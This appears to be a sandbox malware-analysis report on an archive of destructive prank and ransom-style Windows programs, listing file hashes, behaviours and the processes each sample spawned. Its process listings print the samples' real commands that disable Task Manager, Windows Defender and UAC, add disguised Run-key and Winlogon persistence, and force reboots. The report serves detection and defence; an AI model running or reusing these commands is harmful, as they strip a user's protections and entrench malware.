Analysis Overview
SHA256
ceba879db245f9a04c51607671ceeb214afbf10ea12f59bbea9202f94eff65e9
Threat Level: Known bad
The file Dest.rar was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Possible privilege escalation attempt
Disables Task Manager via registry modification
ASPack v2.12-2.42
Modifies file permissions
Executes dropped EXE
Adds Run key to start application
Writes to the Master Boot Record (MBR)
UPX packed file
Sets desktop wallpaper using registry
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Kills process with taskkill
System policy modification
Delays execution with timeout.exe
Modifies Control Panel
Modifies registry class
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 14:13
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:19
Platform
win11-20241007-en
Max time kernel
292s
Max time network
282s
Command Line
Signatures
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat" "
C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe
clwcp c:\covid20\bg.bmp
C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe
flasher 5 c:\covid20\covid.bmp
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs"
Network
Files
memory/1976-0-0x0000000000400000-0x0000000001A7B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat
| MD5 | b08e02e536917f897acb2d21f42f0a97 |
| SHA1 | a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45 |
| SHA256 | 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c |
| SHA512 | 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\bg.bmp
| MD5 | cb065726febf9c1a581f3008e678f524 |
| SHA1 | f9a0058a57213cf7ce72eddf0616a938c8f4f4b1 |
| SHA256 | d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f |
| SHA512 | b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880 |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bmp
| MD5 | 738bbd119d8877f8342e1ff00fe60dff |
| SHA1 | fc11d85e3c5b46bd877e06985fec1a601ce396ed |
| SHA256 | 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb |
| SHA512 | f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe
| MD5 | e62ee6f1efc85cb36d62ab779db6e4ec |
| SHA1 | da07ec94cf2cb2b430e15bd0c5084996a47ee649 |
| SHA256 | 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a |
| SHA512 | 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69 |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe
| MD5 | 9254ca1da9ff8ad492ca5fa06ca181c6 |
| SHA1 | 70fa62e6232eae52467d29cf1c1dacb8a7aeab90 |
| SHA256 | 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6 |
| SHA512 | a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a |
C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs
| MD5 | e61624dced063c4ba5352bf487f12410 |
| SHA1 | 40bd08928900cd97f444ffaa78d93dcaf913b274 |
| SHA256 | 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3 |
| SHA512 | 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac |
memory/1976-33-0x0000000000400000-0x0000000001A7B000-memory.dmp
memory/2464-34-0x0000000000400000-0x0000000000484000-memory.dmp
memory/2876-35-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-36-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-37-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/2876-48-0x0000000000400000-0x00000000004A4000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
9s
Max time network
12s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
Network
Files
memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat
| MD5 | b11c0b55dba339bbe3169584fa0eedd8 |
| SHA1 | 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9 |
| SHA256 | f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073 |
| SHA512 | 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\prompt.vbs
| MD5 | 52ac951762c9b42fb4492dfdde2ba4ae |
| SHA1 | 0821a0dea46432fc4db10a2dc6312d42a872ab9f |
| SHA256 | 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3 |
| SHA512 | c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\blood.bmp
| MD5 | 040d29b801e3488f7aee3f9708128eea |
| SHA1 | 433591a971325f7529cbb7a1d16645ff65ee10c7 |
| SHA256 | fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de |
| SHA512 | 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826 |
C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe
| MD5 | b53852cb556ec28efc39b986caddb791 |
| SHA1 | 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a |
| SHA256 | ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a |
| SHA512 | 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599 |
memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:14
Platform
win11-20241007-en
Max time kernel
4s
Max time network
7s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d
Network
Files
memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd
| MD5 | 47f426fb3883f2da30e9aa2a7d693fa5 |
| SHA1 | 50d843d68817717f21ba96d26a571ad996a5e35a |
| SHA256 | b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b |
| SHA512 | 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb |
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\note.bmp
| MD5 | ed30c76a614ec8db5e4ac22e2929f53d |
| SHA1 | 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4 |
| SHA256 | 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a |
| SHA512 | ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b |
C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe
| MD5 | c875f76e521f520404401122bd82630a |
| SHA1 | 3b1c78420a55b9a768b28168753c4e22982421ef |
| SHA256 | a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11 |
| SHA512 | b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b |
memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 14:13
Reported
2024-11-08 14:17
Platform
win11-20241007-en
Max time kernel
219s
Max time network
202s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
